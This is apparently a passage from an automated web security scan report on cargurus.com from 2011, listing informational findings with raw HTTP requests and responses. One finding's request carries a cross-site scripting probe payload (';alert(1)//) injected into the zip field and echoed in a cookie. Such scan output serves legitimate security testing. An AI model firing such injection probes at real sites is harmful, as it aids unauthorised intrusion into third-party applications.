<img style="width:152px;" src="http://images.cars.com/phototab/DMI/3798/AN1656.jpg"></img>
...[SNIP]...
<div class="cg-dealFinder-result-img">


<img style="width:152px;" src="http://images.cars.com/phototab/DMI/3140/U089271.jpg"></img>
...[SNIP]...

6.2. http://www.cargurus.com/Cars/serveJumpstartAd.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/serveJumpstartAd.action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Cars/serveJumpstartAd.action?bannerOrd=694486511&adSenseHints=Acura%20TL&adSenseChannel=5696859814 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.3.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:17 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:17 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 2587


<html>
   <head>
        <base href="http://ad.doubleclick.net/">
       
   </head>

   <body>

   <div class="jumpstartAd">
    <script type="text/javascript">
function pr_swfver(){
var osf,osfd,i
...[SNIP]...
<!-- Begin Interstitial Ad -->
<img src="http://ad.doubleclick.net/imp;v7;x;231097667;0-0;0;57811210;0/0;38862944/38880701/1;;~aopt=2/1/75/1;~okv=;dcmt=text/xml;prod=model;section=buyers_guide;type=sedan;mak=acura;mod=tl;yr=2008;sz=728x90;u=section_buyers_guide%7cprod_model%7cmod_tl%7cmak_acura%7ctype_sedan%7cyr_2008%7csz_728x90%7c;dcove=d;dcopt=ist;tile=1;~cs=b%3fhttp://a.collective-media.net/datapair?net=jd&segs=gu,acura,tl,sedan,&op=blang&p1=gu" width="0" height="0" />

   </div>
...[SNIP]...

6.3. http://www.cargurus.com/Cars/serveJumpstartAd.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/serveJumpstartAd.action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Cars/serveJumpstartAd.action?bannerOrd=473378449&adSenseHints=Acura&adSenseChannel=5696859814 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; jag_rsi_segs=; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:11 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:11 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 2492


<html>
   <head>
        <base href="http://ad.doubleclick.net/">
       
   </head>

   <body>

   <div class="jumpstartAd">
    <script type="text/javascript">
function pr_swfver(){
var osf,osfd,i
...[SNIP]...
<!-- Begin Interstitial Ad -->
<img src="http://ad.doubleclick.net/imp;v7;x;231097667;0-0;0;57811437;0/0;38862944/38880701/1;;~aopt=2/1/75/1;~okv=;dcmt=text/xml;prod=make;section=buyers_guide;mak=acura;sz=728x90;u=section_buyers_guide%7cprod_make%7cmak_acura%7csz_728x90%7c;dcove=d;dcopt=ist;tile=1;~cs=z%3fhttp://a.collective-media.net/datapair?net=jd&segs=gu,acura,,,&op=blang&p1=gu" width="0" height="0" />

   </div>
...[SNIP]...

6.4. https://www.cargurus.com/Cars/authentication/renderLoginForm.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /Cars/authentication/renderLoginForm.action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Cars/authentication/renderLoginForm.action?redirectUrl=%2FCars%2Finventorylisting%2FviewDetailsFilterViewInventoryListing.action%3Fign-makerId-entitySelectingHelper.selectedEntity%3Dm4%26amp%3Bign-modelId-entitySelectingHelper.selectedEntity%3D%26amp%3BentitySelectingHelper.selectedEntity%3Dm4%26amp%3Bzip%3D02110%26amp%3BsourceContext%3DcarGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.4.9.1316369668126; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:36 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:36 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/
Content-Length: 14419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.
...[SNIP]...
<!-- Include core styles -->
   <link rel="stylesheet" type="text/css" media="all" href="https://d3m77u1tzcw5kp.cloudfront.net/gzip/ssl/grouped_css/cg_site_global_66742757DAC6FF6E2DB4DD7BCE1A249E40910C84.css">

<!-- End include core styles -->
   <link rel="stylesheet" type="text/css" media="all" href="https://d3m77u1tzcw5kp.cloudfront.net/gzip/ssl/grouped_css/cargurus_9872F1DDC41C3C9D8DB60EDF7EA258DFF0C86DEF.css">

<link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" >

   <script type="text/javascript" src="https://d3m77u1tzcw5kp.cloudfront.net/gzip/grouped_js/ext-lib_7D34D01B1047694C4B31FB0267625235C6EF0837.js"></script>
   <script type="text/javascript" src="https://d3m77u1tzcw5kp.cloudfront.net/gzip/grouped_js/cargurus_9523ED9D880A9CB9B4D929060B16B4147837413B.js"></script>
...[SNIP]...
<a href="#" class="g-searchButton"><img src="https://d3m77u1tzcw5kp.cloudfront.net/gfx/icons/silk/zoom.png" style="vertical-align:middle"/></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

7. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


7.1. http://www.cargurus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:12:44 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:12:44 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 59071


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

7.2. http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.1.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jag_rsi_segs=; Coyote-2-c0a8020a=c0a8021e:0

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:09 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:09 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Set-Cookie: preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; Expires=Fri, 16-Sep-2016 13:13:09 GMT; Path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 143496


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://ww
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

7.3. https://www.cargurus.com/Cars/authentication/renderLoginForm.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /Cars/authentication/renderLoginForm.action

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Cars/authentication/renderLoginForm.action?redirectUrl=%2FCars%2Finventorylisting%2FviewDetailsFilterViewInventoryListing.action%3Fign-makerId-entitySelectingHelper.selectedEntity%3Dm4%26amp%3Bign-modelId-entitySelectingHelper.selectedEntity%3D%26amp%3BentitySelectingHelper.selectedEntity%3Dm4%26amp%3Bzip%3D02110%26amp%3BsourceContext%3DcarGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; currentPageType=listings_m4; jag_rsi_segs=; cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Coyote-2-c0a8020a=c0a8021e:0; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.4.9.1316369668126; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:36 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:36 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=4, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020c=c0a80220:0; path=/
Content-Length: 14419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" >

   <script type="text/javascript" src="https://d3m77u1tzcw5kp.cloudfront.net/gzip/grouped_js/ext-lib_7D34D01B1047694C4B31FB0267625235C6EF0837.js"></script>
   <script type="text/javascript" src="https://d3m77u1tzcw5kp.cloudfront.net/gzip/grouped_js/cargurus_9523ED9D880A9CB9B4D929060B16B4147837413B.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

8. Credit card numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


8.1. http://www.cargurus.com/Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action

Issue detail

The following credit card numbers were disclosed in the response:

Request

POST /Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action?sourceContext=carGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110eeba1%27%3balert(1)//652968ded5e&sourceContext=carGurusHomePage_false_0
Content-Length: 373
Cookie: JSESSIONID=67BBD60ACDDEDAC4476812D0EB8ACC65.www13; Coyote-2-c0a8020a=c0a80220:0; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMGVlYmExJzthbGVydCgxKS8vNjUyOTY4ZGVkNWUqc3RhdGU9TUEq; __utma=247535637.15450501.1316369743.1316369743.1316369743.1; __utmb=247535637.3.10.1316369743; __utmc=247535637; __utmz=247535637.1316369743.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; CarGurusUserT=50.23.123.106.1316351677408; jag_rsi_segs=; currentPageType=listings_m4
Pragma: no-cache
Cache-Control: no-cache

zip=02110eeba1'%3Balert(1)%2F%2F652968ded5e&address=Boston%2C+MA&latitude=&longitude=&distance=MILES_75&selectedEntity=m4&entitySelectingHelper.selectedEntity2=&minPrice=null&maxPrice=null&minMileage=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:15:14 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:15:14 GMT
Access-Control-Allow-Origin: google.com,googleusercontent.com
Set-Cookie: pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110eeba1';alert(1)//652968ded5e@}/"; Version=1; Max-Age=7776000; Expires=Sat, 17-Dec-2011 13:15:14 GMT; Path=/
Content-Disposition: inline
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: application/json;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a80220:0; path=/
Content-Length: 1988434

{"sellers":[{"id":233435,"location":"Westerville, OH","longitude":-82.94229888916016,"sellerType":"Dealer","latitude":40.058998107910156},{"id":248607,"location":"Orland Park, IL","longitude":-87.8209
...[SNIP]...
ishkill, NY","longitude":-73.8772964477539,"sellerType":"Dealer","latitude":41.54309844970703},{"id":171218,"location":"Hamilton, OH","longitude":-84.54779815673828,"sellerType":"Dealer","latitude":39.370601654052734},{"id":167394,"location":"Durham, NC","longitude":-78.92340087890625,"sellerType":"Dealer","latitude":36.027099609375},{"id":56418,"location":"Windsor Locks, CT","longitude":-72.62799835205078,"seller
...[SNIP]...
awndale, CA","longitude":-118.35299682617188,"sellerType":"Dealer","latitude":33.86180114746094},{"id":195169,"location":"Gurnee, IL","longitude":-87.99340057373047,"sellerType":"Dealer","latitude":42.38589859008789},{"id":167369,"location":"Sheridan, IN","longitude":-86.2123031616211,"sellerType":"Dealer","latitude":40.13130187988281},{"id":244910,"location":"Denville, NJ","longitude":-74.47779846191406,"sellerT
...[SNIP]...
hall, PA","longitude":-80.02279663085938,"sellerType":"Dealer","latitude":40.364498138427734},{"id":56386,"location":"New London, CT","longitude":-72.11070251464844,"sellerType":"Dealer","latitude":41.36149978637695},{"id":205836,"location":"Augusta, GA","longitude":-82.05280303955078,"sellerType":"Dealer","latitude":33.452301025390625},{"id":248610,"location":"Tampa, FL","longitude":-82.50679779052734,"sellerTyp
...[SNIP]...
5620002746582},{"id":870,"location":"Marlborough, MA","longitude":-71.50080108642578,"sellerType":"Dealer","latitude":42.351200103759766},{"id":247935,"location":"Maryland Heights, MO","longitude":-90.4446029663086,"sellerType":"Dealer","latitude":38.66960144042969},{"id":187250,"location":"Longmont, CO","longitude":-105.0270004272461,"sellerType":"Dealer","latitude":40.15959930419922},{"id":171954,"location":"B
...[SNIP]...
tude":33.64039993286133},{"id":187911,"location":"Campbell, CA","longitude":-121.9469985961914,"sellerType":"Dealer","latitude":37.281898498535156},{"id":166904,"location":"Fenton, MO","longitude":-90.36160278320312,"sellerType":"Dealer","latitude":38.52040100097656},{"id":187913,"location":"Thorndale, PA","longitude":-75.77439880371094,"sellerType":"Dealer","latitude":39.99129867553711},{"id":178345,"location":"
...[SNIP]...
den City, ID","longitude":-116.2969970703125,"sellerType":"Dealer","latitude":43.61949920654297},{"id":169244,"location":"Gurnee, IL","longitude":-87.98159790039062,"sellerType":"Dealer","latitude":42.38589859008789},{"id":230936,"location":"Baton Rouge, LA","longitude":-91.06320190429688,"sellerType":"Dealer","latitude":30.387100219726562},{"id":173652,"location":"Greenbelt, MD","longitude":-76.893798828125,"sel
...[SNIP]...
3399353027344},{"id":219806,"location":"Clarksville, MD","longitude":-76.94239807128906,"sellerType":"Dealer","latitude":39.21149826049805},{"id":173754,"location":"East Rochester, NY","longitude":-77.4832992553711,"sellerType":"Dealer","latitude":43.11949920654297},{"id":227582,"location":"Tallahassee, FL","longitude":-84.35790252685547,"sellerType":"Dealer","latitude":30.457599639892578},{"id":219807,"location
...[SNIP]...
":28.055700302124023},{"id":228663,"location":"Covina, CA","longitude":-117.88899993896484,"sellerType":"Dealer","latitude":34.0796012878418},{"id":237891,"location":"Culver City, CA","longitude":-118.38400268554688,"sellerType":"Dealer","latitude":33.97639846801758},{"id":172916,"location":"Escondido, CA","longitude":-117.11100006103516,"sellerType":"Dealer","latitude":33.11690139770508},{"id":207042,"location":
...[SNIP]...
tude":36.0015983581543},{"id":193795,"location":"Dunbar, WV","longitude":-81.71309661865234,"sellerType":"Dealer","latitude":38.32709884643555},{"id":216552,"location":"Pittsfield, MA","longitude":-73.30010223388672,"sellerType":"Dealer","latitude":42.4635009765625},{"id":225161,"location":"Newark, NJ","longitude":-74.18109893798828,"sellerType":"Dealer","latitude":40.74800109863281},{"id":172283,"location":"Broo
...[SNIP]...

8.2. http://www.cargurus.com/Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cargurus.com
Path:   /Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action

Issue detail

The following credit card numbers were disclosed in the response:

Request

POST /Cars/inventorylisting/ajaxFetchSubsetInventoryListing.action?sourceContext=carGurusHomePage_false_0 HTTP/1.1
Host: www.cargurus.com
Proxy-Connection: keep-alive
Referer: http://www.cargurus.com/Cars/inventorylisting/viewDetailsFilterViewInventoryListing.action?ign-makerId-entitySelectingHelper.selectedEntity=m4&ign-modelId-entitySelectingHelper.selectedEntity=&entitySelectingHelper.selectedEntity=m4&zip=02110&sourceContext=carGurusHomePage_false_0
Content-Length: 352
Origin: http://www.cargurus.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=77CB4FE9E1AD6B9836E46C9ECE62FD26.www11; CarGurusUserT=50.23.123.106.1316351563780; jag_rsi_segs=; preferredContactInfo=Y2l0eT1Cb3N0b24qcG9zdGFsQ29kZT0wMjExMCpzdGF0ZT1NQSo_; Coyote-2-c0a8020a=c0a8021e:0; currentPageType=listings_m4; __utma=247535637.1762063622.1316369633.1316369633.1316369633.1; __utmb=247535637.2.10.1316369633; __utmc=247535637; __utmz=247535637.1316369633.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

zip=02110&address=Boston%2C+MA&latitude=42.359&longitude=-71.058&distance=MILES_75&selectedEntity=m4&entitySelectingHelper.selectedEntity2=&minPrice=null&maxPrice=null&minMileage=null&maxMileage=null&
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 13:13:11 GMT
Server: Apache/2.2.3 (CentOS)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Last-Modified: Sun, 18 Sep 2011 13:13:11 GMT
Set-Cookie: cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/Cars/
Set-Cookie: cargurusGeoLocation=42.359%3A-71.058%3ABoston%2C+MA; Expires=Fri, 16-Sep-2016 13:13:11 GMT; Path=/
Access-Control-Allow-Origin: google.com,googleusercontent.com
Set-Cookie: pastListingSearches="{@d@:75,@t@:1316318400000,@e@:@m4@,@y1@:0,@y2@:0,@z@:@02110@}/"; Version=1; Max-Age=7776000; Expires=Sat, 17-Dec-2011 13:13:11 GMT; Path=/
Content-Disposition: inline
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Type: application/json;charset=UTF-8
Set-Cookie: Coyote-2-c0a8020a=c0a8021e:0; path=/
Content-Length: 398062

{"sellers":[{"proximity":49.76031516231796,"id":229914,"longitude":-71.00540161132812,"sellerType":"Dealer","latitude":41.63990020751953},{"proximity":15.783690606699704,"id":209526,"longitude":-70.94
...[SNIP]...
d":1158,"longitude":-71.43789672851562,"sellerType":"Dealer","latitude":43.04840087890625},{"proximity":4.640553199398762,"id":231061,"longitude":-71.14530181884766,"sellerType":"Dealer","latitude":42.36130142211914},{"proximity":34.24472520278736,"id":232275,"longitude":-71.45960235595703,"sellerType":"Dealer","latitude":42.74700164794922},{"proximity":59.28126232923445,"id":232276,"longitude":-71.27549743652344
...[SNIP]...
:232463,"longitude":-71.05570220947266,"sellerType":"Dealer","latitude":42.43259811401367},{"proximity":4.630558529867609,"id":230790,"longitude":-71.14510345458984,"sellerType":"Dealer","latitude":42.36149978637695},{"proximity":13.1449733828111,"id":232309,"longitude":-70.96659851074219,"sellerType":"Dealer","latitude":42.53580093383789},{"proximity":46.0186286350703,"id":217664,"longitude":-71.44180297851562,"
...[SNIP]...

9. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.cargurus.com
Path:   /Cars/authentication/renderLoginForm.action

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

